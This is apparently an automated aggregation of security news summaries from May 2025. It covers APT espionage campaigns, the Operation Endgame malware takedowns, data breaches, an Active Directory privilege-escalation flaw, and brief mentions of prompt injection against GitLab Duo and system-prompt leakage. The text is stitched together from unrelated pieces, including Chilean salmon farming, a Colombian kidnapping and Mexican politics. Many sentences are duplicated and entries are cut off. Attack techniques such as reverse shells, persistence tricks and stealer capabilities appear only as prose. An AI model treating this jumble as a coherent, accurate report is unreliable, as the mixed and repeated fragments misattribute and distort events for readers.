China-linked cybereaspionage group APT31 (aka Zirconium, Judgment Panda, and Red Keres) was involved in multiple cyber espionage operations, it made the headlines in 2022 after the Check Point Research team discovered that the group used a tool dubbed Jian, which is a clone of NSA Equation Group ‘s “EpMe” hacking tool, years before it was leaked online by Shadow Brokers hackers. APT31, also known as Zirconium or Judgment Panda, has been operational for more than a decade, stealing diplomatic cables, industrial designs, and political strategy documents from Europe, North America, and Asia. "Autosummary:
Overview of the attack Source: Google APT41 attack flow The attack starts with a malicious email sent to targets, linking to a ZIP archive hosted on a previously compromised government website. "Autosummary:
Hosts: Graham Cluley: @grahamcluley.com @[email protected] Carole Theriault: @caroletheriault Guest: Allan Liska – @ransomwaresommelier.com Episode links: Sponsored by: Vanta – Expand the scope of your security program with market-leading compliance automation… while saving time and money. "Autosummary:
Chile"s salmon farms hope for calmer waters 9 hours ago Share Save Jane Chambers Business reporter Reporting from Puerto Montt, Chile Share Save Getty Images Chile has 1,343 offshore salmon farms scattered up and down the coast in the south of the country Chile is the world"s second-largest exporter of farmed salmon, and the biggest supplier to the US.Regarding salmon farming in national reserves, he says that is a different environment which, according to Chilean law and the rules and regulations they follow, they can operate in. "Autosummary:
Brazilian prosecutors are suing Chinese electric vehicle (EV) giant BYD and two of its contractors, saying they were responsible for human trafficking and conditions "analogous to slavery" at a factory construction site in the country. "In this Help Net Security interview, Michael Metzler, Vice President Horizontal Management Cybersecurity for Digital Industries at Siemens, discusses the cybersecurity implications of deploying AI agents in industrial environments. He talks about the risks that come with AI agents making semi-autonomous decisions, and why a layered security approach like Defense-in-Depth is key to keeping industrial systems safe. What are the implications of an AI agent being compromised in a critical infrastructure environment, such as an … More
The post How AI agents reshape industrial automation and risk management appeared first on Help Net Security.
"Autosummary:
The Defense-in-Depth concept considers all essential security factors, including physical access protection for manufacturing sites, organizational and technical measures to protect production networks and control systems from unauthorized access, espionage, and manipulation.He talks about the risks that come with AI agents making semi-autonomous decisions, and why a layered security approach like Defense-in-Depth is key to keeping industrial systems safe.Well-implemented security measures such as continuous verification, appropriate access controls, and behavioral analytics enable organizations to effectively utilize AI capabilities while maintaining operational safety and security. "Application Security Engineer, SDO AppSec Amazon | EMEA | Hybrid – View job details As an Application Security Engineer, SDO AppSec, you will be responsible for creating, updating, and maintaining threat models across a diverse range of software projects. Part of your role will involve developing security automation tools to enhance efficiency and consistency. You will perform adversarial security analysis, leveraging tools to complement manual testing efforts. CISO AudioCodes | Israel | Hybrid – View … More
The post Cybersecurity jobs available right now: May 27, 2025 appeared first on Help Net Security.
"Autosummary:
Manager, Information Security Risk Acrisure | USA | On-site – View job details As a Manager, Information Security Risk, you will conduct comprehensive third party risk assessments, analyzing security policies, procedures, controls, and compliance with regulatory requirements. Cybersecurity Analyst I, Applications The University of British Columbia | Canada | Hybrid – View job details As a Cybersecurity Analyst I, Applications, you will design, implement, configure and manage application security solutions based on business, security, and privacy needs. Senior Cyber Security Engineer – Software Development JLR | Ireland | Hybrid – No longer accepting applications As a Senior Cyber Security Engineer – Software Development, you will design, implement, and maintain software applications related to security functionalities such as crypto key management, HSM APIs, secure logging, and firewalls. Information Security Director Sycurio | United Kingdom | Hybrid – View job details As an Information Security Director, you will develop, maintain, and expand the information security management system (‘ISMS’) in line with an optimise compliance for ISO27001, PCI-DSSS and SOC2 compliance. NOC Analyst The Guitar Center Company | USA | On-site – View job details As a NOC Analyst, you will monitor operational systems, networks, and applications to ensure availability, performance, and security. "Autosummary:
"However, based on TAG-110"s historical activity and tool set, it is likely that successful initial access via the macro-enabled templates would result in the deployment of additional malware, such as HATVIBE, CHERRYSPY, LOGPIE, or potentially a new, custom-developed payload designed for espionage operations," the company said. "Autosummary:
"Void Blizzard"s cyberespionage operations tend to be highly targeted at specific organizations of interest to the Russian government, including in government, defense, transportation, media, non-governmental organizations (NGOs), and healthcare sectors primarily in Europe and North America," Microsoft said in a Tuesday report. "Autosummary:
"Autosummary:
Luna Moth, also called Chatty Spider, Silent Ransom Group (SRG), Storm-0252, and UNC3753, is known to be active since at least 2022, primarily employing a tactic called callback phishing or telephone-oriented attack delivery (TOAD) to trick unsuspecting users into calling phone numbers listed in benign-looking phishing emails related to invoices and subscription payments. "Autosummary:
“ The impacted personal information varies by customer and could include different types depending on what each customer provided, including name, phone number, email address, mailing and service addresses, Nova Scotia Power program participation information, date of birth, and customer account history (such as power consumption, service requests, customer payment, billing, and credit history, and customer correspondence), driver’s license number, and Social Insurance Number.Its operations encompass generation, transmission, and distribution of electricity, utilizing a diverse mix of energy sources including coal, natural gas, hydroelectric, wind, tidal, oil, and biomass. "Autosummary:
That shift saves hours of patching, clears out the noise, and most importantly, lets security teams more effectively focus on real threats and effectively stop chasing ghosts. This post breaks down why traditional vulnerability prioritization often leads you astray, and how a better approach, exposure validation, helps teams focus on what’s truly exploitable. It’s like running safe, controlled attack simulations, using real-world adversarial techniques, to see if the entire kill chain of the exploitation campaign works on you. Now it’s time to check your security stack: cloud controls, network protections, endpoint tools, and SIEM rules.However, in your real-world environment, this vuln would be blocked and detected, letting you deal with far more critical vulnerabilities to your org.And many tools, scanners, patching platforms, and dashboards still sort them by raw CVSS or EPSS scores. "Autosummary:
"Autosummary:
" Active since at least April 2024, the hacking group is linked to espionage operations mainly targeting organizations that are important to Russian government objectives, including those in government, defense, transportation, media, non-governmental organizations (NGOs), and healthcare sectors in Europe and North America. "Autosummary:
"Autosummary:
" As a way of setting up persistence, the transferred "nginx" binary is added to the "/root/.bash_aliases" file to make sure that it automatically launches upon shell login. "Autosummary:
The report by Sophos says that the threat actors first used SimpleHelp to perform reconnaissance on customer systems, such as collecting information about the MSP"s customers, including device names and configuration, users, and network connections. "Autosummary:
As Bleeping Computer reports, earlier this month Adidas did disclose that customers in Turkey and South Korea who had contacted its customer service centre had had their contact information (including names, email addresses, phone numbers, dates of birth, and postal addresses) stolen. "Autosummary:
"Utilizing state-of-the-art tactics such as polymorphic identifiers, advanced man‑in‑the‑middle proxy mechanisms and multi-factor authentication bypass techniques, the attackers aim to harvest credentials and two-factor authentication (2FA) codes, enabling real-time access to social media accounts," the KnowBe4 Threat Lab said in a report. "DefectDojo announced next-gen Security Operations Center (SOC) capabilities for DefectDojo Pro, which provides both SOC and AppSec professionals a unified platform for noise reduction and prioritization of SOC alerts and AppSec findings. As both SOC and AppSec teams attempt to cut through noisy data from a sprawling set of tools and sources, Dojo Pro now allows two security teams to work from the same platform. SOC teams, like their counterparts in AppSec, are facing a … More
The post DefectDojo’s SOC capabilities simplify cybersecurity operations appeared first on Help Net Security.
"Autosummary:
These include the Rules Engine, which enables teams to customize rules to automatically manipulate, edit, enhance, add custom remediation advice, escalate, or de-escalate specific findings, all without significant human effort; the universal parser, allowing for data ingestion from any tool producing JSON or XML data; and next-generation prioritization evaluation. "A wave of layoffs has swept through the tech industry, leaving IT teams in a rush to revoke all access those employees may have had. Additionally, 54% of tech hiring managers say their companies are likely to conduct layoffs within the next year, and 45% say employees whose roles can be replaced by AI are most likely to be let go, according to General Assembly. Taking away access to company data the moment someone leaves … More
The post Why layoffs increase cybersecurity risks appeared first on Help Net Security.
"Autosummary:
The types of data that can be extracted: Client/customer data Company confidential Employee HR data Financial data Sensitive project files Source code Unreleased or sensitive marketing Lack of monitoring during workforce transitions: During large-scale layoffs, teams often cannot cover all aspects of offboarding alongside their regular duties. Mitigation strategies for safer offboarding Revoke access to user accounts, systems, applications, and networks. "NIST has introduced a new way to estimate which software vulnerabilities have likely been exploited, and it’s calling on the cybersecurity community to help improve and validate the method. The new metric, “Likely Exploited Vulnerabilities” (LEV), aims to close a key gap in vulnerability management: identifying which of the thousands of reported flaws each year are actually being used in real-world attacks. Organizations typically rely on two main tools for this: the Exploit Prediction Scoring … More
The post NIST proposes new metric to gauge exploited vulnerabilities appeared first on Help Net Security.
"Autosummary:
It’s a statistical estimate, not a confirmation, which is why the whitepaper emphasizes that LEV is meant to augment, not replace, existing methods. The new metric, “Likely Exploited Vulnerabilities” (LEV), aims to close a key gap in vulnerability management: identifying which of the thousands of reported flaws each year are actually being used in real-world attacks.For now, it works best with CVEs published after March 2023, when EPSS version 3, the most accurate to date, was introduced. "Autosummary:
This week"s list includes — CVE-2025-34025, CVE-2025-34026, CVE-2025-34027 (Versa Concerto), CVE-2025-30911 (RomethemeKit For Elementor WordPress plugin), CVE-2024-57273, CVE-2024-54780, and CVE-2024-54779 (pfSense), CVE-2025-41229 (VMware Cloud Foundation), CVE-2025-4322 (Motors WordPress theme), CVE-2025-47934 (OpenPGP.js), CVE-2025-30193 (PowerDNS), CVE-2025-0993 (GitLab), CVE-2025-36535 (AutomationDirect MB-Gateway), CVE-2025-47949 (Samlify), CVE-2025-40775 (BIND DNS), CVE-2025-20152 (Cisco Identity Services Engine), CVE-2025-4123 (Grafana), CVE-2025-5063 (Google Chrome), CVE-2025-37899 (Linux Kernel), CVE-2025-26817 (Netwrix Password Secure), CVE-2025-47947 (ModSecurity), CVE-2025-3078, CVE-2025-3079 (Canon Printers), and CVE-2025-4978 (NETGEAR).According to court documents, Council used his personal computer to search incriminating phrases such as "SECGOV hack," "telegram sim swap," "how can I know for sure if I am being investigated by the FBI," "What are the signs that you are under investigation by law enforcement or the FBI even if you have not been contacted by them," "what are some signs that the FBI is after you," "Verizon store list," "federal identity theft statute," and "how long does it take to delete telegram account."According to court documents, Council used his personal computer to search incriminating phrases such as "SECGOV hack," "telegram sim swap," "how can I know for sure if I am being investigated by the FBI," "What are the signs that you are under investigation by law enforcement or the FBI even if you have not been contacted by them," "what are some signs that the FBI is after you," "Verizon store list," "federal identity theft statute," and "how long does it take to delete telegram account."The DBatLoader malware distributed through phishing emails has the cunning behavior of exploiting normal processes (easinvoker.exe, loader.exe) through techniques such as DLL side-loading and injection for most of its behaviors, and it also utilizes normal processes (cmd.exe, powershell.exe, esentutl.exe, extrac32.exe) for behaviors such as file copying and changing policies," the company said."The DBatLoader malware distributed through phishing emails has the cunning behavior of exploiting normal processes (easinvoker.exe, loader.exe) through techniques such as DLL side-loading and injection for most of its behaviors, and it also utilizes normal processes (cmd.exe, powershell.exe, esentutl.exe, extrac32.exe) for behaviors such as file copying and changing policies," the company said." — Microsoft has revealed that it"s making post-quantum cryptography (PQC) capabilities, including ML-KEM and ML-DSA, available for Windows Insiders, Canary Channel Build 27852 and higher, and Linux, SymCrypt-OpenSSL version 1.9.0.Microsoft Announces Availability of Quantum-Resistant Algorithms to SymCrypt — Microsoft has revealed that it"s making post-quantum cryptography (PQC) capabilities, including ML-KEM and ML-DSA, available for Windows Insiders, Canary Channel Build 27852 and higher, and Linux, SymCrypt-OpenSSL version 1.9.0. — An unknown threat actor has been attributed to creating several malicious Chrome Browser extensions since February 2024 that masquerade as seemingly benign utilities such as DeepSeek, Manus, DeBank, FortiVPN, and Site Stats but incorporate covert functionality to exfiltrate data, receive commands, and execute arbitrary code.Another Russian hacking group, Gamaredon, remained the most prolific actor targeting the East European nation, enhancing malware obfuscation and introducing PteroBox, a file stealer leveraging Dropbox. — The Russia-aligned Sandworm group intensified destructive operations against Ukrainian energy companies, deploying a new wiper named ZEROLOT.Over 100 Google Chrome Extensions Mimic Popular Tools — An unknown threat actor has been attributed to creating several malicious Chrome Browser extensions since February 2024 that masquerade as seemingly benign utilities such as DeepSeek, Manus, DeBank, FortiVPN, and Site Stats but incorporate covert functionality to exfiltrate data, receive commands, and execute arbitrary code.While the extensions appear to offer the advertised features, they also stealthily facilitate credential and cookie theft, session hijacking, ad injection, malicious redirects, traffic manipulation, and phishing via DOM manipulation.While the extensions appear to offer the advertised features, they also stealthily facilitate credential and cookie theft, session hijacking, ad injection, malicious redirects, traffic manipulation, and phishing via DOM manipulation."The adopted mechanism will allow, using modern technologies, to strengthen control in the field of migration and will also contribute to reducing the number of violations and crimes in this area," Vyacheslav Volodin, chairman of the State Duma, said."The adopted mechanism will allow, using modern technologies, to strengthen control in the field of migration and will also contribute to reducing the number of violations and crimes in this area," Vyacheslav Volodin, chairman of the State Duma, said."Threat actors may have accessed client secrets for Commvault"s (Metallic) Microsoft 365 (M365) backup software-as-a-service (SaaS) solution, hosted in Azure," CISA said."Threat actors may have accessed client secrets for Commvault"s (Metallic) Microsoft 365 (M365) backup software-as-a-service (SaaS) solution, hosted in Azure," CISA said." — The Dutch government has approved a law criminalizing a wide range of espionage activities, including digital espionage, in an effort to protect national security, critical infrastructure, and high-quality technologies. "Autosummary:
After breaching the system, they used hardcoded MySQL credentials, stored insecurely in system files, to access the database, which contains sensitive information like mobile device data (IMEI, SIM, location), LDAP user details, and Office 365 tokens.China-linked APT UNC5221 started exploiting Ivanti EPMM flaws shortly after their disclosure Pierluigi Paganini May 26, 2025 May 26, 2025 China-linked APT exploit Ivanti EPMM flaws to target critical sectors across Europe, North America, and Asia-Pacific, according to EclecticIQ. "Autosummary:
Marlboro-Chesterfield Pathology disclosed that the breach exposed personal details such as names, addresses, birth dates, medical treatment information, and health insurance data, including policy numbers. "Autosummary:
"Autosummary:
"Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Trojanized KeePass opens doors for ransomware attackers A suspected initial access broker has been leveraging trojanized versions of the open-source KeePass password manager to set the stage for ransomware attacks, WithSecure researchers have discovered. AI hallucinations and their risk to cybersecurity operations AI systems can sometimes produce outputs that are incorrect or misleading, a phenomenon known as hallucinations. These errors … More
The post Week in review: Trojanized KeePass allows ransomware attacks, cyber risks of AI hallucinations appeared first on Help Net Security.
"Autosummary:
Why legal must lead on AI governance before it’s too late In this Help Net Security interview, Brooke Johnson, Chief Legal Counsel and SVP of HR and Security, Ivanti, explores the legal responsibilities in AI governance, highlighting how cross-functional collaboration enables safe, ethical AI use while mitigating risk and ensuring compliance. Closing security gaps in multi-cloud and SaaS environments In this Help Net Security interview, Kunal Modasiya, SVP, Product Management, GTM, and Growth at Qualys, discusses recent Qualys research on the state of cloud and SaaS security. The hidden gaps in your asset inventory, and how to close them In this Help Net Security interview, Tim Grieveson, CSO at ThingsRecon, breaks down the first steps security teams should take to regain visibility, the most common blind spots in asset discovery, and why context should drive risk prioritization. "Autosummary:
" The attacks, like those that have deployed Winos 4.0 in the past, appear to focus specifically on Chinese-speaking environments, with the cybersecurity company calling out the "careful, long-term planning" by a very capable threat actor. "Autosummary:
Neutralized strains include Bumblebee, Lactrodectus, Qakbot, Hijackloader, DanaBot, Trickbot, and Warmcookie, all commonly used in ransomware-as-a-service schemes. "Autosummary:
"Autosummary:
Google Search results Source: BleepingComputer Bleepingcolputer"s tests show that if you visit the fake Zenmap site directly, it shows several AI-generated articles instead, as seen in the image below: Innocuous blog loading on direct hits Source: BleepingComputer "Outsourcing cybersecurity can be a practical and affordable option. It allows small businesses to get the protection they need without straining their budgets, freeing up time and resources to focus on core operations. 76% of SMBs lack the in-house skills to properly address security issues, increasing demand for the expertise and services of MSPs, and 78% are concerned that a severe cyberattack could drive them out of operation, according to ConnectWise. What you can outsource … More
The post Outsourcing cybersecurity: How SMBs can make smart moves appeared first on Help Net Security.
"Autosummary:
76% of SMBs lack the in-house skills to properly address security issues, increasing demand for the expertise and services of MSPs, and 78% are concerned that a severe cyberattack could drive them out of operation, according to ConnectWise.Crisis response and decision-making During an incident, vendors can execute containment and recovery, but only your leadership can make key decisions, such as public disclosures or operational shutdowns.Even if a vendor manages backups or platforms, you should maintain the keys, including credentials, encryption policies, and recovery processes. "Autosummary:
"Autosummary:
"For organizations, this means that private information such as internal rules, functionalities, filtering criteria, permissions, and user roles can be leaked," Trend Micro said in a report published earlier this month. "Duo analyzes the entire context of the page, including comments, descriptions, and the source code — making it vulnerable to injected instructions hidden anywhere in that context," security researcher Omer Mayraz said. "Autosummary:
Chinese threat actors exploited Trimble Cityworks flaw to breach U.S. local government networks Pierluigi Paganini May 23, 2025 May 23, 2025 A Chinese threat actor, tracked as UAT-6382, exploited a patched Trimble Cityworks flaw to deploy Cobalt Strike and VShell. "Autosummary:
After being deployed, Vidar can take desktop screenshots and steal credentials, credit cards, cookies, cryptocurrency wallets, text files, and Authy 2FA authenticator databases. "Autosummary:
" Previous Operation Endgame actions This week"s action follows multiple other Operation Endgame phases, including the seizure of over 100 servers hosting over 2,000 domains used by multiple malware loader operations, including IcedID, Pikabot, Trickbot, Bumblebee, Smokeloader, and SystemBC. "Autosummary:
It"s particularly well-suited for: Organizations with strict data privacy or regulatory compliance requirements Teams Targeted by Sophisticated Bots and Automated Threats Small and medium-sized businesses seeking affordable, enterprise-grade protection DevOps and Security Teams Requiring Full Deployment Control and Customization Projects requiring rapid deployment and easy maintenance Final Words SafeLine stands out as a powerful, open-source alternative to traditional cloud-based WAFs. Key Features of SafeLine WAF Comprehensive Attack Prevention SafeLine effectively blocks a wide range of common and advanced web attacks, including SQL injection(SQLi), cross-site scripting (XSS), OS command injection, CRLF injection, XML External Entity (XXE) attacks, Server Side Request Forgery (SSRF), and directory traversal, etc.With cutting-edge zero-day detection, robust bot mitigation, and zero trust–aligned identity features—all bundled into a self-hosted, easy-to-deploy package—SafeLine empowers developers, security teams, and organizations of all sizes to take control of their web security. "Autosummary:
The malware"s infrastructure consists of multiple components: A "bot" that infects target systems and performs data collection, an "OnlineServer" that manages the RAT functionalities, a "client" for processing collected logs and bot management, and a "server" that handles bot generation, packing, and C2 communication DanaBot has been used in targeted espionage attacks against government officials in the Middle East and Eastern Europe The authors of DanaBot operate as a single group, offering the malware for rent to potential affiliates, who subsequently use it for their own malicious purposes by establishing and managing their own botnets using private servers DanaBot"s developers have partnered with the authors of several malware cryptors and loaders, such as Matanbuchus, and offered special pricing for distribution bundles DanaBot maintained an average of 150 active tier-1 C2 servers per day, with approximately 1,000 daily victims across more than 40 countries, making it one of the largest MaaS platforms active in 2025 Proofpoint, which first identified and named DanaBot in May 2018, said the disruption of the MaaS operation is a win for defenders and that it will have an impact on the cybercriminal threat landscape. High-level diagram of multi-tiered C2 architecture The DoJ further credited several private sector firms, Amazon, CrowdStrike, ESET, Flashpoint, Google, Intel 471, Lumen, PayPal, Proofpoint, Spycloud, Team Cymru, and Zscaler, for providing "valuable assistance." Some of the noteworthy aspects of DanaBot, compiled from various reports, are below - DanaBot"s sub-botnet 5 received commands to download a Delphi-based executable leveraged to conduct HTTP-based distributed denial-of-service (DDoS) attacks against the Ukrainian Ministry of Defence (MOD) webmail server and the National Security and Defense Council (NSDC) of Ukraine in March 2022, shortly after Russia"s invasion of the country Two DanaBot sub-botnets, 24 and 25, were specifically used for espionage purposes likely with an aim to further intelligence-gathering activities on behalf of Russian government interests DanaBot operators have periodically restructured their offering since 2022 to focus on defense evasion, with at least 85 distinct build numbers identified to date (The most recent version is 4006, which was compiled in March 2025) "Autosummary:
As security firm Sophos explains, a virtual machine is deployed on the compromised computer, in an attempt to evade detection from security software, and the attackers roll out a series of commands to create new user accounts and gain admin privileges. "Malware peddlers are using TikTok videos and the ClickFix tactic to trick users into installing infostealer malware on their computers, Trend Micro researchers have warned. The videos are getting published by a number of TikTok user accounts, seem AI-made, and are apparently attracting a large audience. “The videos [verbally] instruct viewers to run a sequence of commands to purportedly activate legitimate software, such as Windows OS, Microsoft Office, CapCut, and Spotify,” the researchers noted. “The … More
The post TikTok videos + ClickFix tactic = Malware infection appeared first on Help Net Security.
"Autosummary:
"Autosummary:
Iskander Rifkatovich Sharafetdinov (aka alik, gucci), 32, a member of the TrickBot group Mikhail Mikhailovich Tsarev (aka mango), 36, a member of the TrickBot group Maksim Sergeevich Galochkin (aka bentley, manuel, Max17, volhvb, crypt), 43, a member of the TrickBot group Vitalii Nikolaevich Kovalev (aka stern, ben, Grave, Vincent, Bentley, Bergen, Alex Konor), 36, a member of the TrickBot group The disclosure comes as Europol took the wraps off a large-scale law enforcement operation that resulted in 270 arrests of dark web vendors and buyers across 10 countries: the United States (130), Germany (42), the United Kingdom (37), France (29), South Korea (19), Austria (4), the Netherlands (4), Brazil (3), Switzerland (1), and Spain (1). "Autosummary:
Incidentally, the malware is one among the many malicious software to suffer an operational setback as part of Operation Endgame, which took down 300 servers worldwide and neutralized 650 domains related to Bumblebee, Lactrodectus, QakBot, HijackLoader, DanaBot, TrickBot, and WARMCOOKIE between May 19 and 22, 2025. "A recent wave of ransomware attacks has disrupted major retailers across the UK. According to a new report from CTM360, the attackers didn’t need to break down the door, they were invited in through misplaced trust and weak identity safeguards. This wasn’t about advanced malware or zero-day vulnerabilities. The attackers used common tactics: impersonating IT staff, tricking employees into handing over credentials, and intercepting multi-factor authentication codes. From there, they moved across networks. What went … More
The post CTM360 report: Ransomware exploits trust more than tech appeared first on Help Net Security.
"Autosummary:
What CISOs should focus on The report recommends: Seeing the organization from an attacker’s perspective Reducing digital exposure across identity and supply chain systems Reviewing remote access practices Applying focused hardening policies that are easy to enforce Auditing how internal trust boundaries are managed Download CTM360’s How To Harden Against Ransomware report and discover how ransomware groups are exploiting identity systems instead of technical flaws.These attacks succeeded not because defences failed, but because basic trust was abused: trust in employees to recognize phishing attempts, trust in identity systems to block unauthorised access, and trust in remote access tools that attackers easily repurposed. "Autosummary:
Attackers can overwrite a binary like "test" with a reverse shell script, which is then executed by a host cron job, resulting in full host compromise The researchers created a video to demonstrate how CVE-2025-34027 could be exploited in attacks: ProjectDiscovery reported the vulnerabilities to the vendor on February 13, with a 90-day disclosure period. "Autosummary:
A vishing attack is a type of phishing attack in which a threat actor uses social engineering tactics via voice communication to scam a target—the word “vishing” is a combination of “voice” and “phishing.” "Autosummary:
The stealer is typically bundled with spoofed software or cracked versions of popular commercial software, targeting users looking to avoid paying for legitimate licenses The operators have created a Telegram marketplace with a rating system for affiliates to sell stolen data without intermediaries The core binary is obfuscated with advanced protection such as low-level virtual machine (LLVM core), Control Flow Flattening (CFF), Control Flow Obfuscation, customized stack decryption, huge stack variables, and dead codes, among others to make static analysis difficult There were more than 21,000 market listings selling Lumma Stealer logs on multiple cybercriminal forums from April through June of 2024, a 71.7% increase from April through June of 2023 "The Lumma Stealer distribution infrastructure is flexible and adaptable," Microsoft said.The Windows maker, which is tracking the threat actor behind the stealer under the name Storm-2477, said its distribution infrastructure is both "dynamic and resilient," leveraging a combination of phishing, malvertising, drive-by download schemes, abuse of trusted platforms, and traffic distribution systems like Prometheus. "Autosummary:
APT28 used various methods for initial access, including brute-force attacks, spear-phishing, and exploiting known vulnerabilities in Outlook, Roundcube, WinRAR, VPNs, and SOHO devices. The APT28 group (aka Fancy Bear, Pawn Storm, Sofacy Group, Sednit, BlueDelta, and STRONTIUM) has been active since at least 2007 and it has targeted governments, militaries, and security organizations worldwide. "Autosummary:
The entities targeted in the latest UNC5221 exploitation campaign are: UK National Health Service institutions National healthcare/pharma provider in North America U.S. medical device manufacturer Municipal agencies in Scandinavia and the UK German Federal Research Institute German telecommunications giant and IT subsidiaries U.S.-based cybersecurity firm Major U.S. foodservice distributor Irish aerospace leasing firm German industrial manufacturer Japanese automotive electronics and powertrain supplier U.S. firearms manufacturer South Korean multinational commercial and consumer bank These were confirmed breaches, as evidenced by reverse shells, data exfiltration/database exports, persistent malware injections, and abuse of internal Office 365 tokens and LDAP configurations. "Autosummary:
"Autosummary:
Other apps now taken down that the company claimed to have operated include Spyier, Neatspy, Fonemonitor, Spyine, and Minspy.The flaw exposed data from the victim’s devices, rendering their messages, photos, and location data visible to whomever wanted them. "Autosummary:
For instance, Lam is said to have purchased at least 31 luxury vehicles, including custom Lamborghinis, Ferraris, Porsches, Mercedes G Wagons, a Rolls-Royce, and a McClaren - some of which have been valued at over US $3 million. "Autosummary:
" The problem identified by Akamai is that during the dMSA Kerberos authentication phase, the Privilege Attribute Certificate (PAC) embedded into a ticket-granting ticket (i.e., credentials used to verify identity) issued by a key distribution center (KDC) includes both the dMSAs security identifier (SID) as well as the SIDs of the superseded service account and of all its associated groups. "Autosummary:
The Dutch cybersecurity company said the earliest exploitation activity dates back to May 15, 2025, with the attacks targeting healthcare, telecommunications, aviation, municipal government, finance, and defense sectors. "Autosummary:
In this live session, CIS experts will walk you through a practical, no-fluff approach to building a cybersecurity program that meets legal and industry standards—and makes sense for your size, scope, and resources. "Autosummary:
Joy as Colombian boy, 11, freed after 18 days in rebel captivity The freed boy was reunited with his mother and other family members Rebel groups in Colombia are notorious for forcibly recruiting children but the boy"s abduction from his home at gunpoint nevertheless shocked locals. "A privilege escalation vulnerability in Windows Server 2025 can be used by attackers to compromise any user in Active Directory (AD), including Domain Admins. “The [“BadSuccessor”] attack exploits the delegated Managed Service Account (dMSA) feature that was introduced in Windows Server 2025, works with the default configuration, and is trivial to implement,” Akamai researcher Yuval Gordon warned. BadSuccessor attack technique explained The exploitable feature was introduced to help organizations replace the legacy non-managed service accounts … More
The post Unpatched Windows Server vulnerability allows full domain compromise appeared first on Help Net Security.
"Autosummary:
“The [“BadSuccessor”] attack exploits the delegated Managed Service Account (dMSA) feature that was introduced in Windows Server 2025, works with the default configuration, and is trivial to implement,” Akamai researcher Yuval Gordon warned. "Autosummary:
"Autosummary:
Starting in 2019, Qakbot became the initial infection vector in many ransomware attacks from infamous gangs such as Conti, ProLock, Egregor, REvil, RansomExx, MegaCortex, Doppelpaymer, Black Basta, and Cactus. "Autosummary:
"Autosummary:
But, Mrs Morin adds, "The camaraderie is exactly like the military, the busy weeks, the quiet weeks, the jokes that nobody gets unless you"ve been there done that…It"s just a really tight knit community."In addition, he says, military personnel always think in terms of "risk, defence in depth, layers of defence".But, says former infantryman James Murphy, when you see a trashcan by the side of the road, and you know no-one is collecting rubbish that day: "The spider hairs on the back of your neck start tingling." "AutoPatchBench is a new benchmark that tests how well AI tools can fix code bugs. It focuses on C and C++ vulnerabilities found through fuzzing. The benchmark includes 136 real bugs and their verified fixes, taken from the ARVO dataset. Patch generation flowchart CyberSecEval 4 AutoPatchBench is part of Meta’s CyberSecEval 4, a benchmark designed to objectively evaluate and compare various LLM-based auto-patching agents for vulnerabilities specifically identified via fuzzing, a widely used method of … More
The post AutoPatchBench: Meta’s new way to test AI bug fixing tools appeared first on Help Net Security.
"Autosummary:
Patch generation flowchart CyberSecEval 4 AutoPatchBench is part of Meta’s CyberSecEval 4, a benchmark designed to objectively evaluate and compare various LLM-based auto-patching agents for vulnerabilities specifically identified via fuzzing, a widely used method of automated security testing. "Russian APT groups intensified attacks against Ukraine and the EU, exploiting zero-day vulnerabilities and deploying wipers, according to ESET. Ukraine faces rising cyber threats The Russia-aligned Sandworm group intensified destructive operations against Ukrainian energy companies, deploying a new wiper named ZEROLOT. Gamaredon remained the most prolific actor targeting Ukraine, enhancing malware obfuscation and introducing PteroBox, a file stealer leveraging Dropbox. “The infamous Sandworm group concentrated heavily on compromising Ukrainian energy infrastructure. In recent cases, it … More
The post Nation-state APTs ramp up attacks on Ukraine and the EU appeared first on Help Net Security.
"Autosummary:
Meanwhile, other North Korea-aligned groups saw fluctuations in their operational tempo: In early 2025, Kimsuky and Konni returned to their usual activity levels after a noticeable decline at the end of 2024, shifting their targeting away from English-speaking think tanks, NGOs, and North Korea experts to focus primarily on South Korean entities and diplomatic personnel; and Andariel resurfaced, after a year of inactivity, with a sophisticated attack against a South Korean industrial software company. "Autosummary:
“The personal information that has been confirmed to have been leaked so far is a total of 25 types, including users’ mobile phone numbers, IMSI (subscriber identification number), SIM authentication keys, and other SIM-related information that were stored in HSS*.”The company offers cellular service, along with 5G development, AI services, IoT solutions, cloud computing, and smart city infrastructure. "Autosummary:
"In Fashion, Home & Beauty, online sales and trading profit have been heavily impacted by the necessary decision to pause online shopping, however stores have remained resilient. "Autosummary:
"Strider announced new capabilities for Spark, the company’s proprietary AI-powered intelligence engine that is transforming how organizations identify and mitigate risks associated with state-sponsored threats. Industry, government, and academic organizations are vulnerable to ongoing nation-state operations that target and compromise networks, intellectual property, people, and supply chains. Spark delivers detailed threat analysis within seconds to provide organizations with deeper insights into the risk environment through a streamlined interface that includes intuitive, query-based exploration. Spark enables … More
The post Strider Spark protects organizations from state-sponsored threats appeared first on Help Net Security.
"Autosummary:
More specifically, Spark enables users to: Illuminate and accelerate essential risk intelligence: Spark cuts through scattered signals, noise, and data overload to uncover potential state-sponsored threats linked to individuals, organizations, and technology.Today, Spark delivers the familiar AI interface features like natural language search, real-time analysis, suggested searches, threaded replies, multilingual input, and more. "Autosummary:
"Autosummary:
The mayor"s private secretary, Ximena Guzmán, and Brugada"s adviser, José Muñoz, were killed on their way to work on Tuesday morning local time. "Autosummary:
“They have been acting as enablers of various Russian state-sponsored and affiliated actors to conduct destabilising activities including, information manipulation interference and cyber-attacks against the Union and third countries” - Council of the European Union Stark Industries is incorporated in the United Kingdom and provides VPS/VDS servers in the UK, the Netherlands, Germany, France, Turkey, and the U.S. The company provides multiple payment methods, including Bitcoin, Monero, Dash, and Ether cryptocurrency, typically used to hide payment origin. "Autosummary:
"While it is customary for Kettering Health to contact patients by phone to discuss payment options for medical bills, out of an abundance of caution, we will not be making calls to ask for or receive payment over the phone until further notice," it added. "Autosummary:
"Autosummary:
The loader, besides monitoring for analysis tools such as Wireshark, OllyDbg, Procmon, ProcExp, PeStudio, and Fiddler, makes Windows Registry changes to set up persistence and launches the second-stage by injecting it into a legitimate system process like "CasPol.exe" or "InstallUtil.exe" to evade detection. "Autosummary:
